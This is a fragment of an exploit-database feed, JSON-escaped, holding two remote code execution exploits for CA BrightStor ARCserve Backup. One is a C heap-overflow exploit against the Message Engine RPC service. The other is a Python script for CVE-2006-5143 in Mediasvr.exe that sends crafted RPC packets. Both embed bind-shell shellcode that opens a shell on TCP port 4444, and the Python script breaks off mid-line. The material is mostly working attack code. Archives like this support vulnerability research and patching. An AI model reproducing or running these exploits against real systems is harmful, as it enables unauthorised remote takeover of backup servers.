<winsock2.h>\r\n\r\n#pragma comment(lib, \"ws2_32\")\r\n#pragma pack(1)\r\n\r\n#define _DCE_RPC_REQ 0x00\r\n#define _DCE_RPC_BIND 0x0B\r\n\r\n#define PKT_LEN 2048+24\r\n#define STUB_LEN 2048\r\n\r\nunsigned char jmp[]=\"\\xeb\\x0a\\x90\\x90\";\r\nunsigned char esi[]=\"\\xbf\\x75\\x40\\x2d\";\r\nunsigned char uef[]=\"\\x4c\\x14\\x54\\x7c\";\r\n\r\n//4444\r\nunsigned char bindshell[]=\r\n\"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xe0\"\r\n\"\\x6f\\xe3\\x2a\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x05\\x08\\x67\\x08\\x96\\x1c\\xd5\"\r\n\"\\x1f\\x0f\\x68\\x46\\xc4\\x4b\\x68\\x6f\\xdc\\xe4\\x9f\\x2f\\x98\\x6e\\x0c\\xa1\"\r\n\"\\xaf\\x77\\x68\\x75\\xc0\\x6e\\x08\\x63\\x6b\\x5b\\x68\\x2b\\x0e\\x5e\\x23\\xb3\"\r\n\"\\x4c\\xeb\\x23\\x5e\\xe7\\xae\\x29\\x27\\xe1\\xad\\x08\\xde\\xdb\\x3b\\xc7\\x02\"\r\n\"\\x95\\x8a\\x68\\x75\\xc4\\x6e\\x08\\x4c\\x6b\\x63\\xa8\\xa1\\xbf\\x73\\xe2\\xc1\"\r\n\"\\xe3\\x43\\x68\\xa3\\x8c\\x4b\\xff\\x4b\\x23\\x5e\\x38\\x4e\\x6b\\x2c\\xd3\\xa1\"\r\n\"\\xa0\\x63\\x68\\x5a\\xfc\\xc2\\x68\\x6a\\xe8\\x31\\x8b\\xa4\\xae\\x61\\x0f\\x7a\"\r\n\"\\x1f\\xb9\\x85\\x79\\x86\\x07\\xd0\\x18\\x88\\x18\\x90\\x18\\xbf\\x3b\\x1c\\xfa\"\r\n\"\\x88\\xa4\\x0e\\xd6\\xdb\\x3f\\x1c\\xfc\\xbf\\xe6\\x06\\x4c\\x61\\x82\\xeb\\x28\"\r\n\"\\xb5\\x05\\xe1\\xd5\\x30\\x07\\x3a\\x23\\x15\\xc2\\xb4\\xd5\\x36\\x3c\\xb0\\x79\"\r\n\"\\xb3\\x3c\\xa0\\x79\\xa3\\x3c\\x1c\\xfa\\x86\\x07\\xf2\\x76\\x86\\x3c\\x6a\\xcb\"\r\n\"\\x75\\x07\\x47\\x30\\x90\\xa8\\xb4\\xd5\\x36\\x05\\xf3\\x7b\\xb5\\x90\\x33\\x42\"\r\n\"\\x44\\xc2\\xcd\\xc3\\xb7\\x90\\x35\\x79\\xb5\\x90\\x33\\x42\\x05\\x26\\x65\\x63\"\r\n\"\\xb7\\x90\\x35\\x7a\\xb4\\x3b\\xb6\\xd5\\x30\\xfc\\x8b\\xcd\\x99\\xa9\\x9a\\x7d\"\r\n\"\\x1f\\xb9\\xb6\\xd5\\x30\\x09\\x89\\x4e\\x86\\x07\\x80\\x47\\x69\\x8a\\x89\\x7a\"\r\n\"\\xb9\\x46\\x2f\\xa3\\x07\\x05\\xa7\\xa3\\x02\\x5e\\x23\\xd9\\x4a\\x91\\xa1\\x07\"\r\n\"\\x1e\\x2d\\xcf\\xb9\\x6d\\x15\\xdb\\x81\\x4b\\xc4\\x8b\\x58\\x1e\\xdc\\xf5\\xd5\"\r\n\"\\x95\\x2b\\x1c\\xfc\\xbb
\\x38\\xb1\\x7b\\xb1\\x3e\\x89\\x2b\\xb1\\x3e\\xb6\\x7b\"\r\n\"\\x1f\\xbf\\x8b\\x87\\x39\\x6a\\x2d\\x79\\x1f\\xb9\\x89\\xd5\\x1f\\x58\\x1c\\xfa\"\r\n\"\\x6b\\x38\\x1f\\xa9\\x24\\x0b\\x1c\\xfc\\xb2\\x90\\x33\\x42\\x10\\xe5\\xe7\\x75\"\r\n\"\\xb3\\x90\\x35\\xd5\\x30\\x6f\\xe3\\x2a\";\r\n\r\ntypedef struct dceRpc{\r\n\tunsigned char\tver;\r\n\tunsigned char\tver_minor;\r\n\tunsigned char\tpkt_type;\r\n\tunsigned char\tpkt_flags;\r\n\tunsigned long\tdata_repres;\r\n\tunsigned short\tfrag_len;\r\n\tunsigned short\tauth_len;\r\n\tunsigned long\tcaller_id;\r\n} DCE_RPC, *PDCE_RPC;\r\n\r\ntypedef struct dceRpc2{\r\n\tunsigned long\talloc_hint;\r\n\tunsigned short\tcon_id;\r\n\tunsigned short\topnum;\r\n} DCE_RPC2, *PDCE_RPC2;\r\n\r\ntypedef struct dceRpcBind{\r\n\tunsigned short\tmax_xmit;\r\n\tunsigned short\tmax_recv;\r\n\tunsigned long\tasc_group;\r\n\tunsigned long\tnum_con_items;\r\n\tunsigned short\tcon_id;\r\n\tunsigned short\tnum_trn_items;\r\n} DCE_RPC_BIND, *PDCE_RPC_BIND;\r\n\r\nint\r\nlsHex2Raw(unsigned char* s, unsigned char* out)\r\n{\r\n\tunsigned long i;\r\n\tunsigned long j=0;\r\n\tunsigned long len;\r\n\tunsigned long ret=0;\r\n\r\n\tlen=strlen(s);\r\n\r\n\tfor(i=0; i<len; i+=2){\r\n\t\tif((s[i]>=0x30)&&(s[i]<=0x39))\r\n\t\t\tj=s[i]-0x30;\r\n\t\telse\r\n\t\t\tj=s[i]-0x61+10;\r\n\t\tj*=16;\r\n\t\tif((s[i+1]>=0x30)&&(s[i+1]<=0x39))\r\n\t\t\tj+=s[i+1]-0x30;\r\n\t\telse\r\n\t\t\tj+=s[i+1]-0x61+10;\r\n\t\tout[ret]=(unsigned char)j;\r\n\t\tret++;\r\n\t}\r\n\r\n\treturn(ret);\r\n}\r\n\r\nvoid\r\nlsInverse(unsigned char* io, unsigned long len)\r\n{\r\n\tunsigned char c;\r\n\tunsigned long i;\r\n\r\n\tfor(i=0; i<len/2; i++){\r\n\t\tc=io[len-i-1];\r\n\t\tio[len-i-1]=io[i];\r\n\t\tio[i]=c;\r\n\t}\r\n}\r\n\r\nint\r\nlsEncodeUuid(unsigned char* uuid, unsigned char* out)\r\n{\r\n\tunsigned ar=0;\r\n\tunsigned cnt=0;\r\n\tunsigned long i;\r\n\tunsigned long len;\r\n\tunsigned long ret;\r\n\tunsigned char* ptr;\r\n\r\n\tptr=uuid;\r\n\tlen=strlen(uuid);\r\n\r\n\tfor(i=0; 
i<len; i++){\r\n\t\tif(uuid[i]=='-'){\r\n\t\t\tuuid[i]='\\0';\r\n\t\t\tif(ar<3){\r\n\t\t\t\tret=lsHex2Raw(ptr, out);\r\n\t\t\t\tlsInverse(out, ret);\r\n\t\t\t\tout+=ret;\r\n\t\t\t\tcnt+=ret;\r\n\t\t\t}else{\r\n\t\t\t\tret=lsHex2Raw(ptr, out);\r\n\t\t\t\tout+=ret;\r\n\t\t\t\tcnt+=ret;\r\n\t\t\t}\r\n\t\t\tptr=uuid+i+1;\r\n\t\t\tar++;\r\n\t\t}\r\n\t}\r\n\tout[len]='\\0';\r\n\tret=lsHex2Raw(ptr, out);\r\n\tout+=ret;\r\n\tcnt+=ret;\r\n\r\n\treturn(cnt);\r\n}\r\n\r\nunsigned char*\r\nlsDceRpcBind(unsigned long cid, unsigned char* uuid, unsigned short ver, unsigned long* pktLen){\r\n\tunsigned char* pkt;\r\n\tunsigned char* tmp;\r\n\tunsigned char transferSyntax[]=\"8a885d04-1ceb-11c9-9fe8-08002b104860\";\r\n\tunsigned short ret;\r\n\tunsigned long cnt;\r\n\tPDCE_RPC_BIND rpc_bind;\r\n\tPDCE_RPC rpc;\r\n\r\n\tpkt=(unsigned char*)calloc(2048, 1);\r\n\r\n/* 2nd half */\r\n\ttmp=pkt;\r\n\tpkt+=sizeof(DCE_RPC);\r\n\trpc_bind=(PDCE_RPC_BIND)pkt;\r\n\trpc_bind->max_xmit = 0x16D0;\t\t//Max Xmit Frag\r\n\trpc_bind->max_recv = 0x16D0;\t\t//Max Recv Frag\r\n\trpc_bind->asc_group = 0; \t\t//Assoc Group\r\n\trpc_bind->num_con_items = 1; \t\t//Num Ctx Items\r\n\trpc_bind->con_id = 0; \t\t//Context ID\r\n\trpc_bind->num_trn_items = 1; \t\t//Num Trans Items\r\n\tpkt+=sizeof(DCE_RPC_BIND);\r\n\tcnt=lsEncodeUuid(uuid, pkt); //Interface UUID\r\n\tpkt+=cnt;\r\n\tmemcpy(pkt, &ver, sizeof(short));\t\t//Interface Ver\r\n\tpkt+=sizeof(short);\r\n\t*pkt++=0; \t\t//Interface Ver Minor\r\n\t*pkt++=0; \t\t//Interface Ver Minor\r\n\tcnt=lsEncodeUuid(transferSyntax, pkt);\t//Transfer Syntax\r\n\tpkt+=cnt;\r\n\t*pkt++=2; \t\t//Transfer Syntax Ver\r\n\t*pkt++=0; \t\t//Transfer Syntax Ver\r\n\r\n/* 1st half */\r\n\tret=pkt+2-tmp;\r\n\trpc=(PDCE_RPC)tmp;\r\n\trpc->ver = 5; \t\t//Version\r\n\trpc->ver_minor = 0; \t\t//Version (minor)\r\n\trpc->pkt_type = _DCE_RPC_BIND;\t\t//Packet Type\r\n\trpc->pkt_flags = 3; \t\t//Packet Flags\r\n\trpc->data_repres = 16; \t\t//Data Representation\r\n\trpc->frag_len = 
ret; \t\t //Frag Length\r\n\trpc->auth_len = 0; \t\t//Auth Length\r\n\trpc->caller_id = cid; \t\t//Call ID\r\n\r\n\t*pktLen=ret;\r\n\r\n\treturn(tmp);\r\n}\r\n\r\nunsigned char*\r\nlsDceRpcReq(unsigned long cid, unsigned long opnum, unsigned char* uuid, unsigned int encoding, unsigned long flags, unsigned long* pktLen){\r\n\tunsigned char* pkt;\r\n\tunsigned char* tmp;\r\n\tunsigned char stub[STUB_LEN];\r\n\tunsigned short ret;\r\n\tunsigned long cnt;\r\n\tPDCE_RPC rpc;\r\n\tPDCE_RPC2 rpc2;\r\n\r\n\tpkt=(unsigned char*)calloc(PKT_LEN, 1);\r\n\r\n/* 2nd half */\r\n\ttmp=pkt;\r\n\tpkt+=sizeof(DCE_RPC);\r\n\trpc2=(PDCE_RPC2)pkt;\r\n\trpc2->alloc_hint = STUB_LEN; //Stub Data\r\n\trpc2->con_id = 0; //Context ID\r\n\trpc2->opnum = opnum; //Operation Number\r\n\tpkt+=sizeof(DCE_RPC2);\r\n\r\n\tif(encoding){\r\n\t\tcnt=lsEncodeUuid(uuid, pkt); //Interface UUID\r\n\t\tpkt+=cnt;\r\n\t}\r\n\r\n/* stub modification */\r\n\r\n\tmemset(stub, 0x90, STUB_LEN);\r\n\r\n\tmemcpy(stub+680, jmp, sizeof(jmp)-1);\r\n\r\n\t//call dword ptr ds:[esi+48]\r\n\r\n\tmemcpy(stub+684, esi, sizeof(esi)-1);\r\n\r\n\t//UnhandledExceptionFilter\r\n\r\n\tmemcpy(stub+688, uef, sizeof(uef)-1);\r\n\r\n\tmemcpy(stub+692, bindshell, sizeof(bindshell)-1);\r\n\r\n/* ----------------- */\r\n\r\n\tmemcpy(pkt, stub, STUB_LEN);\r\n\tpkt+=STUB_LEN;\r\n\r\n/* 1st half */\r\n\tret=pkt-tmp;\r\n\trpc=(PDCE_RPC)tmp;\r\n\trpc->ver = 5; //Version\r\n\trpc->ver_minor = 0; //Version (minor)\r\n\trpc->pkt_type = _DCE_RPC_REQ; //Packet Type\r\n\trpc->pkt_flags = flags; //Packet Flags\r\n\trpc->data_repres = 16; //Data Representation\r\n\trpc->frag_len = ret; //Frag Length\r\n\trpc->auth_len = 0; //Auth Length\r\n\trpc->caller_id = cid; //Call ID\r\n\r\n\t*pktLen=ret;\r\n\r\n\treturn(tmp);\r\n}\r\n\r\nint\r\nlsConnect(unsigned char* host, unsigned short port){\r\n\tint s;\r\n\tstruct hostent* he;\r\n\tstruct sockaddr_in addr;\r\n\tWSADATA wsa;\r\n\r\n\tWSAStartup(MAKEWORD(2,0), 
&wsa);\r\n\tif((he=gethostbyname(host))==NULL){\r\n\t\tprintf(\"[-] unable to resolve %s\\n\", host);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif((s=socket(AF_INET, SOCK_STREAM, 0))<0){\r\n\t\tprintf(\"[-] socket failed\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\taddr.sin_family = AF_INET;\r\n\taddr.sin_port = htons(port);\r\n\taddr.sin_addr = *((struct in_addr*)he->h_addr);\r\n\tmemset(&(addr.sin_zero), '\\0', 8);\r\n\r\n\tif(connect(s, (struct sockaddr*)&addr, sizeof(struct sockaddr))<0){\r\n\t\tprintf(\"[-] connect failed\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\treturn(s);\r\n}\r\n\r\nvoid\r\nlsSend(int s, unsigned char* pkt, unsigned long cnt){\r\n\tif(send(s, pkt, cnt, 0)==-1){\r\n\t\tprintf(\"[-] send failed\\n\");\r\n\t\texit(1);\r\n\t}\r\n}\r\n\r\nvoid\r\nlsRecv(int s){\r\n\tchar recvBuf[4096];\r\n\r\n\tif(recv(s, recvBuf, 4096, 0)<=0){\r\n\t\tprintf(\"[-] recv failed\\n\");\r\n\t\texit(1);\r\n\t}\r\n}\r\n\r\nint\r\nmain(int argc, char* argv[]){\r\n\tint s;\r\n\tunsigned long cnt;\r\n\tunsigned char* pkt=NULL;\r\n\tunsigned char uuidSave[64];\r\n\r\n\t/**********************************************************/\r\n\r\n\tint opnum=43;\r\n\tunsigned short port= 6503;\r\n\tunsigned char uuid[]=\"dc246bf0-7a7a-11ce-9f88-00805fe43838\";\r\n\r\n\t/**********************************************************/\r\n\r\n\tif(argc!=2){\r\n\t\tprintf(\"\\n[-] Usage: %s <ip>\\n\", argv[0]);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf(\"\\n[+] LSsec.com\\n\");\r\n\tprintf(\"\\n[+] CA BrightStor ARCserve Backup v11.5 Message Engine Remote Heap Overflow Exploit\\n\");\r\n\r\n\ts=lsConnect(argv[1], port);\r\n\r\n\tmemset(uuidSave, '\\0', sizeof(uuidSave));\r\n\tstrncpy(uuidSave, uuid, strlen(uuid));\r\n\r\n\t//bind packet\r\n\tpkt=lsDceRpcBind(1, uuid, 1, &cnt);\r\n\tlsSend(s, pkt, cnt);\r\n\tlsRecv(s);\r\n\tfree(pkt);\r\n\r\n\t//request\r\n\tpkt=lsDceRpcReq(1, opnum, uuidSave, 0, 0x03, &cnt);\r\n\tlsSend(s, pkt, cnt);\r\n\tlsRecv(s);\r\n\tfree(pkt);\r\n\r\n\treturn(0);\r\n}", "cvss": {"score": 
7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28765/"}, {"lastseen": "2016-02-03T08:52:48", "description": "Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities (2). CVE-2006-5143. Remote exploit for windows platform", "published": "2006-10-05T00:00:00", "type": "exploitdb", "title": "Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "modified": "2006-10-05T00:00:00", "id": "EDB-ID:28766", "href": "https://www.exploit-db.com/exploits/28766/", "sourceData": "source: http://www.securityfocus.com/bid/20365/info\r\n \r\nMultiple Computer Associates products are prone to multiple buffer-overflow vulnerabilities because the applications using an affected library fail to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.\r\n \r\nExploiting these issues allows attackers to execute arbitrary machine code within the context of the affected application.\r\n\r\n#!/usr/bin/python\r\n#\r\n# Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Code Exploit\r\n# (Previously Unknown)\r\n#\r\n# There seems to be an design error in the handling of RPC data with xdr procedures\r\n# across several .dll's imported by Mediasvr.exe. Four bytes from an RPC packet are\r\n# processed as a particular address (xdr_handle_t data which is run through multiple bit\r\n# shifts, and reversing of bytes), and eventually loaded into ECX.\r\n#\r\n# The 191 (0xbf) procedure, followed by nulls (at least 8 bytes of nulls, which may\r\n# be Null Credentials and Auth?) 
leads to an exploitable condition.\r\n#\r\n# .text:0040AACD 008 mov ecx, [esp+8]\r\n# .text:0040AAD1 008 mov dword_418820, esi\r\n# .text:0040AAD7 008 push offset dword_418820\r\n# .text:0040AADC 00C mov eax, [ecx]\r\n# .text:0040AADE 00C call dword ptr [eax+2Ch]\r\n#\r\n# At this point, you have control of ECX (esp+8 is your address data). The data from the packet\r\n# is stored in memory and is relatively static (see NOTE).\r\n#\r\n# The address is then loaded into EAX, and then called as EAX+2Ch, which is\r\n# controllable data from the packet. In this code, I just jump ahead to\r\n# the portbinding shellcode.\r\n#\r\n# NOTE: The only issue I have found is when the system is rebooted, the packet data\r\n# appears at a higher memory location when Mediasvr.exe crashes\r\n# and is restarted. I have accounted for this in the code, when the port that\r\n# Mediasvr.exe is listening on is below TCP port 1100, which is usually only after\r\n# a reboot\r\n#\r\n# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest\r\n# CA patches on Windows XP SP2 (I believe there is some issue with SP1, which\r\n# is more then likely the memory locations)\r\n#\r\n# The patches include the following updates to Mediasvr.exe\r\n# http://supportconnectw.ca.com/public/storage/infodocs/babimpsec-notice.asp\r\n#\r\n# CA has been notified\r\n#\r\n# Author: M. 
Shirk\r\n# Tester: Tebodell\r\n#\r\n# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com\r\n#\r\n# Use at your own Risk: You have been warned\r\n#------------------------------------------------------------------------\r\n\r\nimport os\r\nimport sys\r\nimport time\r\nimport socket\r\nimport struct\r\n\r\n#------------------------------------------------------------------------\r\n\r\n#Portbind shellcode; Binds shell on TCP port 4444\r\nshellcode = \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\nshellcode += \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\nshellcode += \"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\nshellcode += \"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\nshellcode += \"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\nshellcode += \"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x36\\x4b\\x4e\"\r\nshellcode += \"\\x4d\\x34\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x46\\x4b\\x58\"\r\nshellcode += \"\\x4e\\x56\\x46\\x42\\x46\\x42\\x4b\\x58\\x45\\x54\\x4e\\x53\\x4b\\x48\\x4e\\x57\"\r\nshellcode += \"\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x48\\x4f\\x44\\x4a\\x51\\x4b\\x38\"\r\nshellcode += \"\\x4f\\x55\\x42\\x32\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x58\\x46\\x33\\x4b\\x58\"\r\nshellcode += \"\\x41\\x30\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x48\\x42\\x4c\"\r\nshellcode += \"\\x46\\x37\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\"\r\nshellcode += \"\\x46\\x4f\\x4b\\x53\\x46\\x35\\x46\\x52\\x4a\\x42\\x45\\x57\\x45\\x4e\\x4b\\x48\"\r\nshellcode += \"\\x4f\\x45\\x46\\x52\\x41\\x30\\x4b\\x4e\\x48\\x46\\x4b\\x38\\x4e\\x50\\x4b\\x54\"\r\nshellcode += \"\\x4b\\x48\\x4f\\x45\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x43\\x30\\x4e\\x32\\x4b\\x58\"\r\nshellcode += 
\"\\x49\\x48\\x4e\\x36\\x46\\x42\\x4e\\x41\\x41\\x56\\x43\\x4c\\x41\\x53\\x4b\\x4d\"\r\nshellcode += \"\\x46\\x56\\x4b\\x38\\x43\\x54\\x42\\x43\\x4b\\x58\\x42\\x44\\x4e\\x30\\x4b\\x38\"\r\nshellcode += \"\\x42\\x47\\x4e\\x41\\x4d\\x4a\\x4b\\x58\\x42\\x44\\x4a\\x30\\x50\\x55\\x4a\\x56\"\r\nshellcode += \"\\x50\\x48\\x50\\x34\\x50\\x30\\x4e\\x4e\\x42\\x45\\x4f\\x4f\\x48\\x4d\\x48\\x36\"\r\nshellcode += \"\\x43\\x45\\x48\\x56\\x4a\\x46\\x43\\x53\\x44\\x33\\x4a\\x46\\x47\\x37\\x43\\x57\"\r\nshellcode += \"\\x44\\x33\\x4f\\x35\\x46\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x4b\\x4c\\x4d\\x4e\"\r\nshellcode += \"\\x4e\\x4f\\x4b\\x53\\x42\\x45\\x4f\\x4f\\x48\\x4d\\x4f\\x35\\x49\\x38\\x45\\x4e\"\r\nshellcode += \"\\x48\\x46\\x41\\x58\\x4d\\x4e\\x4a\\x30\\x44\\x30\\x45\\x35\\x4c\\x36\\x44\\x30\"\r\nshellcode += \"\\x4f\\x4f\\x42\\x4d\\x4a\\x46\\x49\\x4d\\x49\\x50\\x45\\x4f\\x4d\\x4a\\x47\\x35\"\r\nshellcode += \"\\x4f\\x4f\\x48\\x4d\\x43\\x35\\x43\\x45\\x43\\x55\\x43\\x45\\x43\\x35\\x43\\x34\"\r\nshellcode += \"\\x43\\x55\\x43\\x34\\x43\\x45\\x4f\\x4f\\x42\\x4d\\x48\\x46\\x4a\\x36\\x41\\x41\"\r\nshellcode += \"\\x4e\\x45\\x48\\x36\\x43\\x45\\x49\\x58\\x41\\x4e\\x45\\x39\\x4a\\x56\\x46\\x4a\"\r\nshellcode += \"\\x4c\\x31\\x42\\x37\\x47\\x4c\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x4c\\x46\\x42\\x31\"\r\nshellcode += \"\\x41\\x55\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x42\"\r\nshellcode += \"\\x49\\x4e\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x43\\x55\\x45\\x35\\x4f\\x4f\\x42\\x4d\"\r\nshellcode += \"\\x4a\\x36\\x45\\x4e\\x49\\x54\\x48\\x58\\x49\\x44\\x47\\x55\\x4f\\x4f\\x48\\x4d\"\r\nshellcode += \"\\x42\\x55\\x46\\x35\\x46\\x35\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x43\\x39\\x4a\\x56\"\r\nshellcode += \"\\x47\\x4e\\x49\\x47\\x48\\x4c\\x49\\x37\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x45\\x45\"\r\nshellcode += \"\\x4f\\x4f\\x42\\x4d\\x48\\x46\\x4c\\x36\\x46\\x56\\x48\\x36\\x4a\\x46\\x43\\x46\"\r\nshellcode += 
\"\\x4d\\x46\\x49\\x58\\x45\\x4e\\x4c\\x56\\x42\\x35\\x49\\x55\\x49\\x52\\x4e\\x4c\"\r\nshellcode += \"\\x49\\x38\\x47\\x4e\\x4c\\x56\\x46\\x54\\x49\\x58\\x44\\x4e\\x41\\x53\\x42\\x4c\"\r\nshellcode += \"\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x54\\x4d\\x52\\x50\\x4f\\x44\\x34\\x4e\\x32\"\r\nshellcode += \"\\x43\\x49\\x4d\\x48\\x4c\\x47\\x4a\\x33\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x36\"\r\nshellcode += \"\\x44\\x47\\x50\\x4f\\x43\\x4b\\x48\\x41\\x4f\\x4f\\x45\\x57\\x46\\x34\\x4f\\x4f\"\r\nshellcode += \"\\x48\\x4d\\x4b\\x45\\x47\\x55\\x44\\x55\\x41\\x45\\x41\\x35\\x41\\x55\\x4c\\x36\"\r\nshellcode += \"\\x41\\x30\\x41\\x35\\x41\\x55\\x45\\x45\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x56\"\r\nshellcode += \"\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\\x43\\x35\\x4f\\x4f\\x48\\x4d\\x4c\\x56\"\r\nshellcode += \"\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\\x42\\x4d\\x4b\\x38\\x47\\x55\\x4e\\x4f\"\r\nshellcode += \"\\x43\\x48\\x46\\x4c\\x46\\x36\\x4f\\x4f\\x48\\x4d\\x44\\x55\\x4f\\x4f\\x42\\x4d\"\r\nshellcode += \"\\x4a\\x46\\x42\\x4f\\x4c\\x48\\x46\\x50\\x4f\\x45\\x43\\x55\\x4f\\x4f\\x48\\x4d\"\r\nshellcode += \"\\x4f\\x4f\\x42\\x4d\\x5a\\x90\"\r\n\r\n#------------------------------------------------------------------------\r\n\r\n#First Packet\r\nrpc_packet1=\"\\x80\\x00\\x80\\x34\\x65\\xcf\\x4c\\x7b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nrpc_packet1+=\"\\x02\\x00\\x06\\x09\\x7e\\x00\\x00\\x00\\x01\"\r\n\r\n#Prodcedure 190 and nulls\r\nrpc_packet1+=\"\\x00\\x00\\x00\\xbf\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n#Apparently these 4 bytes can be anything\r\nrpc_packet1+=\"\\x00\\x00\\x00\\x00\"\r\n\r\n#This value is important for the location of the next address\r\nrpc_packet1+=\"\\x00\\x00\\x00\\x00\"\r\n\r\n#Hardcoded Address loaded into ECX\r\nrpc_packet1+=\"\\x00\\xae\\x27\\x64\"\r\n\r\n#Just spacing\r\nrpc_packet1+=\"\\x41\\x42\\x43\\x44\"\r\n\r\n#Addess in memory, loaded into EAX and called with EAX+2Ch to get to 
shellcode\r\nrpc_packet1+=\"\\x3c\\x27\\xae\\x00\"\r\n\r\n#jump to shellcode for packet 1\r\nrpc_packet1+=\"\\x6c\\x27\\xae\\x00\"\r\nrpc_packet1+=\"\\xeb\\x01\"\r\nrpc_packet1+=shellcode\r\n\r\n#------------------------------------------------------------------------\r\n\r\n#Second Packet\r\nrpc_packet2=\"\\x80\\x00\\x80\\x34\\x65\\xcf\\x4c\\x7b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nrpc_packet2+=\"\\x02\\x00\\x06\\x09\\x7e\\x00\\x00\\x00\\x01\"\r\n\r\n#Procedure 190 and nulls\r\nrpc_packet2+=\"\\x00\\x00\\x00\\xbf\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n#Apparently these 4 bytes can be anything\r\nrpc_packet2+=\"\\x00\\x00\\x00\\x00\"\r\n\r\n#This value is important for the location of the next address\r\nrpc_packet2+=\"\\x00\\x00\\x00\\x00\"\r\n\r\n#Hardcoded Address loaded into ECX that seems to be hit after Mediasvr.exe has been\r\n#restarted\r\nrpc_packet2+=\"\\x00\\x9e\\x27\\x64\"\r\n\r\n#Just spacing\r\nrpc_packet2+=\"\\x41\\x42\\x43\\x44\"\r\n\r\n#Addess stored in memory, loaded into EAX and called with EAX+2Ch to get to shellcode\r\nrpc_packet2+=\"\\x3c\\x27\\x9e\\x00\"\r\n\r\n#jump to shellcode for packet 2\r\nrpc_packet2+=\"\\x6c\\x27\\x9e\\x00\"\r\nrpc_packet2+=\"\\xeb\\x01\"\r\nrpc_packet2+=shellcode\r\n\r\n# Portmap request for Mediasvr.exe\r\nrpc_portmap_req=\"\\x80\\x00\\x00\\x38\\x21\\x84\\xf7\\xc9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nrpc_portmap_req+=\"\\x02\\x00\\x01\\x86\\xa0\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x03\\x00\\x00\"\r\nrpc_portmap_req+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\nrpc_portmap_req+=\"\\x06\\x09\\x7e\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\"\r\n\r\n#------------------------------------------------------------------------\r\n\r\ndef GetMediaSvrPort(target):\r\n sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n sock.connect((target,111))\r\n sock.send(rpc_portmap_req)\r\n rec = sock.recv(256)\r\n sock.close()\r\n\r\n port1 = rec[-4]\r\n port2 
= rec[-3]\r\n port3 = rec[-2]\r\n port4 = rec[-1] \r\n \r\n port1 = hex(ord(port1))\r\n port2 = hex(ord(port2))\r\n port3 = hex(ord(port3))\r\n port4 = hex(ord(port4))\r\n port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(port4,16))\r\n \r\n port = int(port,16)\r\n if port < 1100:\r\n print '[+] Fresh Meat: Mediasvr.exe has not been restarted, Sending Packet 1 to: Target: %s Port: %s' %(target,port)\r\n ExploitMediaSvr(target,port,1)\r\n else:\r\n print '[+] Mediasvr.exe has been restarted, Sending Packet 2 to: Target: %s Port: %s' % (target,port)\r\n ExploitMediaSvr(target,port,2)\r\n\r\ndef ExploitMediaSvr(target,port,p):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.connect((target, port))\r\n if p == 1:\r\n sock.send(rpc_packet1) \r\n elif p == 2:\r\n sock.send(rpc_packet2)\r\n sock.close 